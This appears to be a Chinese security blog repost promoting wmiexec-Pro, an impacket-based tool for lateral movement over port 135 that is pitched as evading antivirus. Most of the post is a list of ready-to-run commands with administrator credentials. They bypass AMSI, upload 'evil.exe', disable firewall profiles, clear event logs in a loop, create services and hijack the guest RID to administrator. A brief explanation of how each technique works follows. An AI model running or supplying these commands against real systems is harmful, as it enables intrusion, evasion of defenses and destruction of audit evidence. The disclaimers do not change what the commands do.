基本介绍
新一代wmiexec.py,具备更多的新特性,整个操作只与端口135(不需要smb连接)一起工作,用于横向移动中的Byppass AV(Windows Defender,火绒,360)
工具特性
- 主要功能:Bypass AV
- 主要特性:不需要win32_process
- 主要特点:只需要135端口
- 新模块:AMSI Bypass
- 新模块:文件传输
- 新模块:通过wmi类方法远程启用RDP
- 新模块:Windows防火墙滥用
- 新模块:事件日志循环清理
- 新模块:远程启用WinRM,无需触摸CMD
- 新模块:服务经理
- 新模块:RID-劫持
- 增强:以新的方式获得命令执行输出
- 增强功能:执行vbs文件
工具使用
python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h Basic enumeration: python3 wmiexec-pro.py administrator:password@192.168.1.1 enum -run Enable/disable amsi bypass: python3 wmiexec-pro.py administrator:[email protected] amsi -enable python3 wmiexec-pro.py administrator:[email protected] amsi -disable Execute command: python3 wmiexec-pro.py administrator:[email protected] exec-command -shell (Launch a semi-interactive shell) python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (Default is with output mode) python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent (Silent mode) python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003) python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old (With output in old version OS, such as server 2003) python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -save (With output and save output to file) python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old -save python3 wmiexec-pro.py administrator:[email protected] exec-command -clear (Remove temporary class for command result storage) Filetransfer: python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB) python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB) python3 wmiexec-pro.py administrator:[email protected] filetransfer -clear (Remove temporary class for file transfer) RDP: python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall) python3 wmiexec-pro.py administrator:[email protected] rdp -enable -old (For old version OS, such as server 2003) python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003) python3 wmiexec-pro.py administrator:[email protected] rdp -disable python3 wmiexec-pro.py administrator:[email protected] rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003) python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode) WinRM (Only support win7+): python3 wmiexec-pro.py administrator:[email protected] winrm -enable python3 wmiexec-pro.py administrator:[email protected] winrm -disable Firewall (Only support win8+): python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445 python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules) python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule) python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles) python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (Disable all firewall profiles) Services: python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class) python3 wmiexec-pro.py administrator:[email protected] service -action start -service-name "test" python3 wmiexec-pro.py administrator:[email protected] service -action stop -service-name "test" python3 wmiexec-pro.py administrator:[email protected] service -action disable -service-name "test" python3 wmiexec-pro.py administrator:[email protected] service -action auto-start -service-name "test" python3 wmiexec-pro.py administrator:[email protected] service -action manual-start -service-name "test" python3 wmiexec-pro.py administrator:[email protected] service -action getinfo -service-name "test" python3 wmiexec-pro.py administrator:[email protected] service -action delete -service-name "test" python3 wmiexec-pro.py administrator:[email protected] service -dump all-services.json Eventlog: python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (Looping cleaning eventlog) python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (Stop looping cleaning eventlog) RID Hijack: python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry) python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003) python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action activate (Activate user) python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action deactivate (Deactivate user) python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500) python3 wmiexec-pro.py administrator:[email protected] rid-hijack -blank-pass-login enable (Enable blank password login) python3 wmiexec-pro.py administrator:[email protected] rid-hijack -blank-pass-login disable python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 500 -action backup (This will save user profile data as json file) python3 wmiexec-pro.py [email protected] -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked) python3 wmiexec-pro.py [email protected] -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
命令执行:
文件上传
文件下载
工作原理
- AMSI module:来自blackhat asia 2018的Tal-Liberman的技术
- exec-command module:以前项目的增强:wmiexec-RegOut,从wmi类而不是从注册表中获取输出
- filetransfer module:
- 文件上传:将源文件以base64字符串的形式编码到名为WriteFile.vbs的dropper 中,然后创建一个新的ActiveScriptEventConsumer对象实例来执行该dropper
- 文件下载:remote创建一个存储数据的类,然后执行编码器LocalFileIntoClass.vbs对文件进行编码,并将数据存储到刚刚创建的类中
- rdp module:
- 对于启用/禁用:rdp服务:直接控制TerminalServices对象
- 对于启用/禁用:受限管理模式:通过StdRegProv类控制注册表项DisableRestrictedAdmin
- winrm module:
- 启用/禁用:调用服务模块
- 对于防火墙规则:使用firewall.py模块配置winrm的防火墙
-
firewall module:
- 滥用MSFT_NetProtocolPortFilter, MSFT_NetFirewallRule, MSFT_NetFirewallProfile文件类。
-
service module:
- 滥用
Win32_Service类
- 滥用
免责声明
这一开源倡议的精神是帮助安全研究人员和社区加速与网络协议和栈的实现相关的研究活动,此代码库中的信息用于研究和教育目的,不用于生产环境和/或作为商业产品的一部分
如果您希望将此代码或其中的一部分用于自己的用途,我们建议您应用适当的安全开发生命周期和安全编码实践并根据您的需要生成和跟踪相应的危害指标。
由于传播、利用此工具提供的功能而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本人不为此承担任何责任
下载地址
https://github.com/XiaoliChan/wmiexec-Pro
原文始发于微信公众号(七芒星实验室):基于impacket的免杀横向渗透远程命令执行工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论